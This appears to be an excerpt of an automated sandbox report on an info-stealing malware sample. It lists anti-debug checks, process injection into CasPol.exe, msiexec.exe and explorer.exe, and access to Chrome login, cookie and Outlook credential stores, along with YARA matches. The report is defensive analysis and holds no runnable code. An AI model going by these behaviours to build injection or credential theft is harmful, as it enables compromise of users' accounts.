          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045D14FB mov eax, dword ptr fs:[00000030h]4_2_045D14FB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04596CF0 mov eax, dword ptr fs:[00000030h]4_2_04596CF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04596CF0 mov eax, dword ptr fs:[00000030h]4_2_04596CF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04596CF0 mov eax, dword ptr fs:[00000030h]4_2_04596CF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045158EC mov eax, dword ptr fs:[00000030h]4_2_045158EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0452849B mov eax, dword ptr fs:[00000030h]4_2_0452849B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04519080 mov eax, dword ptr fs:[00000030h]4_2_04519080
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04593884 mov eax, dword ptr fs:[00000030h]4_2_04593884
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04593884 mov eax, dword ptr fs:[00000030h]4_2_04593884
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454F0BF mov ecx, dword ptr fs:[00000030h]4_2_0454F0BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454F0BF mov eax, dword ptr fs:[00000030h]4_2_0454F0BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454F0BF mov eax, dword ptr fs:[00000030h]4_2_0454F0BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045420A0 mov eax, dword ptr fs:[00000030h]4_2_045420A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045420A0 mov eax, dword ptr fs:[00000030h]4_2_045420A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045420A0 mov eax, dword ptr fs:[00000030h]4_2_045420A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045420A0 mov eax, dword ptr fs:[00000030h]4_2_045420A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045420A0 mov eax, dword ptr fs:[00000030h]4_2_045420A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045420A0 mov eax, dword ptr fs:[00000030h]4_2_045420A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045590AF mov eax, dword ptr fs:[00000030h]4_2_045590AF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04537D50 mov eax, dword ptr fs:[00000030h]4_2_04537D50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04553D43 mov eax, dword ptr fs:[00000030h]4_2_04553D43
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0453B944 mov eax, dword ptr fs:[00000030h]4_2_0453B944
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0453B944 mov eax, dword ptr fs:[00000030h]4_2_0453B944
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04593540 mov eax, dword ptr fs:[00000030h]4_2_04593540
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451B171 mov eax, dword ptr fs:[00000030h]4_2_0451B171
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451B171 mov eax, dword ptr fs:[00000030h]4_2_0451B171
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0453C577 mov eax, dword ptr fs:[00000030h]4_2_0453C577
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0453C577 mov eax, dword ptr fs:[00000030h]4_2_0453C577
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451C962 mov eax, dword ptr fs:[00000030h]4_2_0451C962
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04519100 mov eax, dword ptr fs:[00000030h]4_2_04519100
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04519100 mov eax, dword ptr fs:[00000030h]4_2_04519100
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04519100 mov eax, dword ptr fs:[00000030h]4_2_04519100
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451AD30 mov eax, dword ptr fs:[00000030h]4_2_0451AD30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045DE539 mov eax, dword ptr fs:[00000030h]4_2_045DE539
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04523D34 mov eax, dword ptr fs:[00000030h]4_2_04523D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04523D34 mov eax, dword ptr fs:[00000030h]4_2_04523D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04523D34 mov eax, dword ptr fs:[00000030h]4_2_04523D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04523D34 mov eax, dword ptr fs:[00000030h]4_2_04523D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04523D34 mov eax, dword ptr fs:[00000030h]4_2_04523D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04523D34 mov eax, dword ptr fs:[00000030h]4_2_04523D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04523D34 mov eax, dword ptr fs:[00000030h]4_2_04523D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04523D34 mov eax, dword ptr fs:[00000030h]4_2_04523D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04523D34 mov eax, dword ptr fs:[00000030h]4_2_04523D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04523D34 mov eax, dword ptr fs:[00000030h]4_2_04523D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04523D34 mov eax, dword ptr fs:[00000030h]4_2_04523D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04523D34 mov eax, dword ptr fs:[00000030h]4_2_04523D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04523D34 mov eax, dword ptr fs:[00000030h]4_2_04523D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E8D34 mov eax, dword ptr fs:[00000030h]4_2_045E8D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454513A mov eax, dword ptr fs:[00000030h]4_2_0454513A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454513A mov eax, dword ptr fs:[00000030h]4_2_0454513A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0459A537 mov eax, dword ptr fs:[00000030h]4_2_0459A537
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04544D3B mov eax, dword ptr fs:[00000030h]4_2_04544D3B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04544D3B mov eax, dword ptr fs:[00000030h]4_2_04544D3B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04544D3B mov eax, dword ptr fs:[00000030h]4_2_04544D3B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04534120 mov eax, dword ptr fs:[00000030h]4_2_04534120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04534120 mov eax, dword ptr fs:[00000030h]4_2_04534120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04534120 mov eax, dword ptr fs:[00000030h]4_2_04534120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04534120 mov eax, dword ptr fs:[00000030h]4_2_04534120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04534120 mov ecx, dword ptr fs:[00000030h]4_2_04534120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04596DC9 mov eax, dword ptr fs:[00000030h]4_2_04596DC9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04596DC9 mov eax, dword ptr fs:[00000030h]4_2_04596DC9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04596DC9 mov eax, dword ptr fs:[00000030h]4_2_04596DC9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04596DC9 mov ecx, dword ptr fs:[00000030h]4_2_04596DC9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04596DC9 mov eax, dword ptr fs:[00000030h]4_2_04596DC9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04596DC9 mov eax, dword ptr fs:[00000030h]4_2_04596DC9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045C8DF1 mov eax, dword ptr fs:[00000030h]4_2_045C8DF1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451B1E1 mov eax, dword ptr fs:[00000030h]4_2_0451B1E1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451B1E1 mov eax, dword ptr fs:[00000030h]4_2_0451B1E1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451B1E1 mov eax, dword ptr fs:[00000030h]4_2_0451B1E1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045A41E8 mov eax, dword ptr fs:[00000030h]4_2_045A41E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0452D5E0 mov eax, dword ptr fs:[00000030h]4_2_0452D5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0452D5E0 mov eax, dword ptr fs:[00000030h]4_2_0452D5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045DFDE2 mov eax, dword ptr fs:[00000030h]4_2_045DFDE2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045DFDE2 mov eax, dword ptr fs:[00000030h]4_2_045DFDE2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045DFDE2 mov eax, dword ptr fs:[00000030h]4_2_045DFDE2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045DFDE2 mov eax, dword ptr fs:[00000030h]4_2_045DFDE2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04542990 mov eax, dword ptr fs:[00000030h]4_2_04542990
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454FD9B mov eax, dword ptr fs:[00000030h]4_2_0454FD9B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454FD9B mov eax, dword ptr fs:[00000030h]4_2_0454FD9B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454A185 mov eax, dword ptr fs:[00000030h]4_2_0454A185
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0453C182 mov eax, dword ptr fs:[00000030h]4_2_0453C182
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04542581 mov eax, dword ptr fs:[00000030h]4_2_04542581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04542581 mov eax, dword ptr fs:[00000030h]4_2_04542581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04542581 mov eax, dword ptr fs:[00000030h]4_2_04542581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04542581 mov eax, dword ptr fs:[00000030h]4_2_04542581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04512D8A mov eax, dword ptr fs:[00000030h]4_2_04512D8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04512D8A mov eax, dword ptr fs:[00000030h]4_2_04512D8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04512D8A mov eax, dword ptr fs:[00000030h]4_2_04512D8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04512D8A mov eax, dword ptr fs:[00000030h]4_2_04512D8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04512D8A mov eax, dword ptr fs:[00000030h]4_2_04512D8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04541DB5 mov eax, dword ptr fs:[00000030h]4_2_04541DB5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04541DB5 mov eax, dword ptr fs:[00000030h]4_2_04541DB5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04541DB5 mov eax, dword ptr fs:[00000030h]4_2_04541DB5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045951BE mov eax, dword ptr fs:[00000030h]4_2_045951BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045951BE mov eax, dword ptr fs:[00000030h]4_2_045951BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045951BE mov eax, dword ptr fs:[00000030h]4_2_045951BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045951BE mov eax, dword ptr fs:[00000030h]4_2_045951BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E05AC mov eax, dword ptr fs:[00000030h]4_2_045E05AC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E05AC mov eax, dword ptr fs:[00000030h]4_2_045E05AC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045461A0 mov eax, dword ptr fs:[00000030h]4_2_045461A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045461A0 mov eax, dword ptr fs:[00000030h]4_2_045461A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045435A1 mov eax, dword ptr fs:[00000030h]4_2_045435A1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045969A6 mov eax, dword ptr fs:[00000030h]4_2_045969A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045DEA55 mov eax, dword ptr fs:[00000030h]4_2_045DEA55
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045A4257 mov eax, dword ptr fs:[00000030h]4_2_045A4257
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04519240 mov eax, dword ptr fs:[00000030h]4_2_04519240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04519240 mov eax, dword ptr fs:[00000030h]4_2_04519240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04519240 mov eax, dword ptr fs:[00000030h]4_2_04519240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04519240 mov eax, dword ptr fs:[00000030h]4_2_04519240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04527E41 mov eax, dword ptr fs:[00000030h]4_2_04527E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04527E41 mov eax, dword ptr fs:[00000030h]4_2_04527E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04527E41 mov eax, dword ptr fs:[00000030h]4_2_04527E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04527E41 mov eax, dword ptr fs:[00000030h]4_2_04527E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04527E41 mov eax, dword ptr fs:[00000030h]4_2_04527E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04527E41 mov eax, dword ptr fs:[00000030h]4_2_04527E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045DAE44 mov eax, dword ptr fs:[00000030h]4_2_045DAE44
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045DAE44 mov eax, dword ptr fs:[00000030h]4_2_045DAE44
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0453AE73 mov eax, dword ptr fs:[00000030h]4_2_0453AE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0453AE73 mov eax, dword ptr fs:[00000030h]4_2_0453AE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0453AE73 mov eax, dword ptr fs:[00000030h]4_2_0453AE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0453AE73 mov eax, dword ptr fs:[00000030h]4_2_0453AE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0453AE73 mov eax, dword ptr fs:[00000030h]4_2_0453AE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0455927A mov eax, dword ptr fs:[00000030h]4_2_0455927A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045CB260 mov eax, dword ptr fs:[00000030h]4_2_045CB260
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045CB260 mov eax, dword ptr fs:[00000030h]4_2_045CB260
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E8A62 mov eax, dword ptr fs:[00000030h]4_2_045E8A62
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0452766D mov eax, dword ptr fs:[00000030h]4_2_0452766D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04515210 mov eax, dword ptr fs:[00000030h]4_2_04515210
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04515210 mov ecx, dword ptr fs:[00000030h]4_2_04515210
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04515210 mov eax, dword ptr fs:[00000030h]4_2_04515210
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04515210 mov eax, dword ptr fs:[00000030h]4_2_04515210
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451AA16 mov eax, dword ptr fs:[00000030h]4_2_0451AA16
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451AA16 mov eax, dword ptr fs:[00000030h]4_2_0451AA16
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454A61C mov eax, dword ptr fs:[00000030h]4_2_0454A61C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454A61C mov eax, dword ptr fs:[00000030h]4_2_0454A61C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04533A1C mov eax, dword ptr fs:[00000030h]4_2_04533A1C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451C600 mov eax, dword ptr fs:[00000030h]4_2_0451C600
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451C600 mov eax, dword ptr fs:[00000030h]4_2_0451C600
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451C600 mov eax, dword ptr fs:[00000030h]4_2_0451C600
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04548E00 mov eax, dword ptr fs:[00000030h]4_2_04548E00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045D1608 mov eax, dword ptr fs:[00000030h]4_2_045D1608
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04528A0A mov eax, dword ptr fs:[00000030h]4_2_04528A0A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045CFE3F mov eax, dword ptr fs:[00000030h]4_2_045CFE3F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451E620 mov eax, dword ptr fs:[00000030h]4_2_0451E620
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04554A2C mov eax, dword ptr fs:[00000030h]4_2_04554A2C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04554A2C mov eax, dword ptr fs:[00000030h]4_2_04554A2C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E8ED6 mov eax, dword ptr fs:[00000030h]4_2_045E8ED6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04558EC7 mov eax, dword ptr fs:[00000030h]4_2_04558EC7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045436CC mov eax, dword ptr fs:[00000030h]4_2_045436CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045CFEC0 mov eax, dword ptr fs:[00000030h]4_2_045CFEC0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04542ACB mov eax, dword ptr fs:[00000030h]4_2_04542ACB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045276E2 mov eax, dword ptr fs:[00000030h]4_2_045276E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04542AE4 mov eax, dword ptr fs:[00000030h]4_2_04542AE4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045416E0 mov ecx, dword ptr fs:[00000030h]4_2_045416E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454D294 mov eax, dword ptr fs:[00000030h]4_2_0454D294
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454D294 mov eax, dword ptr fs:[00000030h]4_2_0454D294
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045AFE87 mov eax, dword ptr fs:[00000030h]4_2_045AFE87
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0452AAB0 mov eax, dword ptr fs:[00000030h]4_2_0452AAB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0452AAB0 mov eax, dword ptr fs:[00000030h]4_2_0452AAB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454FAB0 mov eax, dword ptr fs:[00000030h]4_2_0454FAB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045152A5 mov eax, dword ptr fs:[00000030h]4_2_045152A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045152A5 mov eax, dword ptr fs:[00000030h]4_2_045152A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045152A5 mov eax, dword ptr fs:[00000030h]4_2_045152A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045152A5 mov eax, dword ptr fs:[00000030h]4_2_045152A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045152A5 mov eax, dword ptr fs:[00000030h]4_2_045152A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E0EA5 mov eax, dword ptr fs:[00000030h]4_2_045E0EA5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E0EA5 mov eax, dword ptr fs:[00000030h]4_2_045E0EA5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E0EA5 mov eax, dword ptr fs:[00000030h]4_2_045E0EA5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045946A7 mov eax, dword ptr fs:[00000030h]4_2_045946A7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E8B58 mov eax, dword ptr fs:[00000030h]4_2_045E8B58
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451F358 mov eax, dword ptr fs:[00000030h]4_2_0451F358
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451DB40 mov eax, dword ptr fs:[00000030h]4_2_0451DB40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0452EF40 mov eax, dword ptr fs:[00000030h]4_2_0452EF40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04543B7A mov eax, dword ptr fs:[00000030h]4_2_04543B7A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04543B7A mov eax, dword ptr fs:[00000030h]4_2_04543B7A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451DB60 mov ecx, dword ptr fs:[00000030h]4_2_0451DB60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0452FF60 mov eax, dword ptr fs:[00000030h]4_2_0452FF60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E8F6A mov eax, dword ptr fs:[00000030h]4_2_045E8F6A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Process queried: DebugPort
          Source: C:\Windows\SysWOW64\msiexec.exe; Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Code function: 2_2_0040CF93 LdrLoadDll
          Source: C:\Users\user\Desktop\file.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: D90000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msiexec.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msiexec.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\file.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
          Source: C:\Users\user\Desktop\file.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000
          Source: C:\Users\user\Desktop\file.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: B5F008
          Source: C:\Users\user\Desktop\file.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\file.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Thread register set: target process: 3452
          Source: C:\Windows\SysWOW64\msiexec.exe; Thread register set: target process: 3452
          Source: C:\Users\user\Desktop\file.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
          Source: explorer.exe, 00000003.00000000.253127150.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.512823887.0000000001080000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: XProgram Manager
          Source: explorer.exe, 00000003.00000000.253127150.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000003.461530345.0000000008356000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.525383078.000000000835D000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.253127150.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.252270901.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.511672608.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.253127150.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.512823887.0000000001080000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\file.exe; Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation

          Stealing of Sensitive Information

          Source: Yara match; File source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000002.00000002.285119335.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\msiexec.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Source: C:\Windows\SysWOW64\msiexec.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\msiexec.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\msiexec.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\msiexec.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\msiexec.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\msiexec.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State

          Remote Access Functionality

          Source: Yara match; File source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
